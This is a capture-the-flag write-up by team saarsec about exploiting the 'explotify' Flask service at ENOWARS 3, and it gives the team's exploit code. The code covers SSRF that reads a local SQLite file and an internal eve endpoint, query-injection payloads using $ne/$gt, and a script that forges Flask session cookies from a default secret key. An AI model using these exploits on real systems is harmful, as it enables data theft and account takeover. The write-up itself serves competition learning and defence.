ENOWARS 3 WriteUp explotify

10 July 2019 by Ben, Johannes & Olli

Service Overview

The service itself was a Flask python service. The intended functionality would allow a registered user to generate songs based on given lyrics and (optionally) an MP3 file. If no MP3 was provided, the service would just use a default one, prepend the “lyrics” and output the file. For storage, the service used two different endpoints: for users, it used a SQLite data in /app/explotify_db/explotify.db to store users (specifically, username, password, first and lastname, and mobile number) and a MongoDB to store information about generated songs (notably, the SQLite database also contains a table song, which was not used though). Instead of directly accessing the MongoDB instance, which was actually running in a different Docker instance (explotify_db), its was accessed via an HTTP interface in yet another Docker (db_engine_explotify). Specifically, db_engine_explotify ran a REST endpoint (using the eve library), configured to allow access to the songs collection of the MongoDB.

Flag Storage

Since we did not write the gameserver scripts, we can only guess where flags were supposed to be stored based on the traffic we received. However, there seemed to be a good reason for those places to store flags, so we are confident that we understood what the checker wanted to do (we discuss snafus later on).

Flags in mobile phone number

When registering, the gameserver would provide the flag as the mobile number for that account. Interestingly, we saw that while the gameserver then logged in as the user, no other action was taken. To later on retrieve that flag, the gameserver logged in with the created account, and then accessed the /user/me endpoint, which would (securely) query the SQLite database for information for the account and return this as JSON.

Flags in song name

The alternative way of storing flags, which was only used for a few rounds in the CTF, was to register an account in the system and then upload a song, where the song name was the flag. This was buggy, as in the beginning the gameserver did try to post a new song, but did not specify lyrics/song name; hence not storing anything. One important aspect here is that this was not the only bug in the checker. The second one, which was quite destructive (as we discuss later), was the fact that when this type of flag was being set, the mobile phone number was supposed to be generated randomly, namely from a function generate_random_string defined in the class checker.ExplotifyChecker. Now one may wonder: how can we know this?!

The answer is as follows: instead of actually calling the function, the gameserver script initially must have had something such as

    data = {"username": "....",
            "mobile_number": self.generate_random_string}

Hence, instead of calling the function and getting the result, this merely yield a string such as <bound+method+ExplotifyChecker.generate_random_string+of+<checker.ExplotifyChecker+object+at+0x7fb86024f940>>, which is the string representation of the member function of that class/object. We found that this bug was actually in the checker until at least 15:15 (CEST), as all the traffic not carrying a flag in the phone number contained this as the “phone number”.

Sadly, according to our traffic, flags of this type where only stored between 13:07 and 13:30 (for that period of time, the bug with the random string was seemingly fixed).

Flaws in the service

This service had quite a number of bugs, most of which unfortunately did not help at all due to the broken checkers.

Server-Side Request Forgery

The first thing when not even looking at the code, but rather just the UI, is the fact that if you are not very creative, you can have the server download some content from elsewhere. This screemed Server-Side Request Forgery to us, meaning that we can make the server download a file for us. This type of attack is particularly useful, as it usually enables you to read data from internal servers, or even from the local filesystem.

Looking through the actual code, we find that if there is a URL provided, the following code is invoked. Essentially, the internal function __visit_website_from_link is called, which uses urllib.request to retrieve a URL and return its value. Subsequently, the downloaded content is checked to determine if it is HTML or not. This check, which is shown at the end of the excerpt just uses BeautifulSoup to figure out if there are any tags; if so, the content is deemed to be HTML. Then, depending on whether the content seems to be HTML or not, the content is decoded (note that if it is HTML, there is no "ignore"as the second parameter to invocation of decode!) and returned as base64.

    # services_app/lyrics_generator_service.py from line 48
    def generate_lyrics_from_website(self,website):
        info_website = self.__visit_website_from_link(website)
        test_html = self.__is_html(info_website)
        if test_html:
            decoded_info_website = info_website.decode("utf-8")
            paragraphs = self.__get_paragraphs_from_html(decoded_info_website)
            text = self.__join_paragraphs(paragraphs)
            random_word = self.__generate_random_lyrics(text)
            return base64.b64encode(info_website),random_word,True
        else:
            try:
                decoded_info_website = info_website.decode("utf-8","ignore")
                text = self.__generate_random_lyrics(decoded_info_website)
                return base64.b64encode(info_website),text,True
            except:
                text = self.__generate_from_default_model()
                return base64.b64encode(info_website),text,False

    # services_app/lyrics_generator_service.py from line 77
    def __is_html(self,data):
        test = bool(BeautifulSoup(data, "html.parser").find())
        return test

Stealing the SQLite database

Ok, this seems like a slam dunk and very easy to exploit. Given that urllib can also open a file:// URL, we build the following, simple exploit to attack ourselves (even before the CTF had properly started):

data = {
      'name_song': 'song_'+randomstring(10),
      'web_lyrics': 'true',
      'lyrics': 'file:///app/explotify_db/explotify.db'}

req = sess.request('POST', 'http://' + target + '/song', data=data, timeout=120,
                       files = {'custom_song': open('silence.mp3', 'rb')})

The obvious goal here was to just leak the SQLite database, which contained the phone numbers (we did not know at that point that we’d have to get the phone numbers, but concentrated on just getting the whole database and then regexp-matching for flags). This exploit worked like a charm when we tried it before the network was opened, but failed to work right after.

How the checker script screwed up the flaw

Two minor things ended up the recipe for disaster (or unexploitability ;)) here. First, the difference in handling HTML vs. non-HTML. A SQLite database is a binary format, which contains characters like 0xF8. These, however, have special meaning in UTF-8, as they start a multi-byte sequence. Unfortunately, the next character after the 0xF8 resulted in an invalid UTF-8 character. Therefore, the call to decode (highlighted above, without the additional "ignore" as the parameter for how to handle errors) would fail if the database were to be detected as HTML. But then again, why would it, given the fact that it only stored user info?

Here the mentioned snafu of generating random strings comes into play. As the string representation of the function contains < and >, BeautifulSoup will be able to find tags, meaning it determines a SQLite which contains said string as HTML, essentially breaking the exploitability. This was pretty disappointing; yet, we still managed to steal flags from five teams with this exploit, merely because they must have reset their Docker image of the service at some point after the buggy checker was fixed, so they did not contain “HTML” anymore. We also would like to thank team UlisseLabBO, who apparently joined the game only after the checker had been fixed, which meant that there database remained “stealable” for the rest of the game.

Directly requesting data from the eve endpoint

As mentioned, the service used an eve service running via HTTP on a different machine to retrieve flags. Since we had a SSRF flaw in Explotify, abusing this was quite straight-forward.

data = {
      'name_song': 'song_'+randomstring(10),
      'web_lyrics': 'true',
      'lyrics': 'http://db_engine_explotify:80/songs?sort=-_created'}

req = sess.request('POST', 'http://' + target + '/song', data=data, timeout=120,
                       files = {'custom_song': open('silence.mp3', 'rb')})

This would have allowed us to steal all the flags stored in MongoDB, in particular in descending insertion order. Unfortunately, this did not really yield too many flags, as at some point the checker just stopped handing out flags to be stored in the song names.

Our patch

The straight forward fix we applied was to ensure that the URL of the website did not start with file:// (to avoid the local file read) and did not contain explotify. This would have theoretically allowed other teams to access the endpoint via its IP address, but I does not seem as if anyone went as far as that ;-)

Eve “injection” in search function and username

Apart from abusing the SSRF flaw to extract data from the eve endpoint, there were also two options to “inject” commands into the eve endpoint. In particular, contrary to MongoDB, which for the query db.songs.find({"username": "foo", "username": "bar"}) would return no result (as the username would have had to be both foo and bar at the same time), adding a second field with the same name to the Eve search would ignore the first occurence.

This allowed for two exploits: first, register a user with the name ", "username": {"$ne": 0}}&foo= and then visit to the /song URL. This in turn calls the function get_all_songs_by_username(username) from the Song Service. As shown below in line 2, the username is just put into a format string. Given this username, the resulting URL to be queried from the eve endpoint yields /songs?where={"username": "", "username": {"$ne": 0}}&foo="}.

    def get_all_songs_by_user(self,username):
        song_query = f'where={{ "username": "{ username }"}}'
        song_complete_url = self.__song_endpoint + "?" + song_query
        song = requests.get(song_complete_url)
        data_song = song.json()
        
        if data_song["_meta"]["total"] == 0:
            raise SongNotFoundException("The searched object was not found")
    
        song_data = data_song["_items"]

        return song_data

This effectively queries the MongoDB database for all songs of users whose name is not equal to 0; essentially all of them. In the same manner we could also have abused the /song/<string:hash_id> endpoint, which either called get_song_by_id_from_username or get_song_by_hash_from_username. As the exploits are virtually the same, we just focus on get_song_by_hash_from_username here.

    def get_song_by_hash_from_username(self,hash_id,username):
        song_query = f'where={{ "hash_id" :  "{ hash_id }" , "username": "{ username }"}}'
        song_complete_url = self.__song_endpoint + "?" + song_query
        song = requests.get(song_complete_url)
        data_song = song.json()
        # ...

As the hash_id is really just a string controllable by an attacker, we could easily search for ", "hash_id": {"$ne": 0}}&foo= to get the first entry from the database. Since we only always get a single entry, a more sensible query is as follows: ", "hash_id": {"$ne": 0}, "name_song": {"$gt": "ENO", "$lt": "ENP"}}&sort=-_created&foo=. This makes sure that just look for any hash_id and the name of the song is greater than ENO, but less than ENP (which should hold true for all strings that start with ENO).

We did not actually make use of these in the CTF; mostly because we had already another way to leak song names and only a handful of flags were ever stored there.

Forging cookies

The final piece of the (potential) puzzle could have been to steal the phone numbers from users by forging cookies. In particular, the cookie in Flask is only secured by an HMAC based on a configurable secret key. In the original version of the service, this key was set to super secret key. Our idea, which worked, but did not yield any flags, was as follows: using the eve database, extract the names of the users that recently uploaded songs (as we expected the gameserver to do, but it never did due seemingly broken checker scripts). Once we have the name, forge the cookie and get the /user/me endpoint to extract the phone number.

from flask.sessions import session_json_serializer
from itsdangerous import URLSafeTimedSerializer, BadTimeSignature
from hashlib import sha1

secret_key = 'super secret key'
signer = URLSafeTimedSerializer(secret_key, salt='cookie-session', serializer=session_json_serializer,
                                    signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha1}) 

for username in usernames: # as extracted from the eve endpoint
    json_payload = signer.dumps({"logged_in": True, "user": username})
    print requests.get('http://' + target + '/user/me', cookies={"session": json_payload}, timeout=5).text

Assuming that teams would change their secret key, we also thought about stealing the settings file via the SSRF; yet, given that our exploit against teams with the original, old key did not yield any results (as the gameserver did not actually post songs), we did not follow this further.

Summary & Discussion

Overall, this service had a lot of bugs and you needed to understand how to chain them together. It’s very unfortunate that in the CTF, the checker did not actually perform that well, meaning that a) accidentally broke one flaw due its adding of seeming HTML construct and b) did not upload songs (either to store flags or to just drop the usernames). We will not complain, since we won the CTF, but have been great fun to exploit all these bugs for moar flags :-)

saarsec

Schwenk and pwn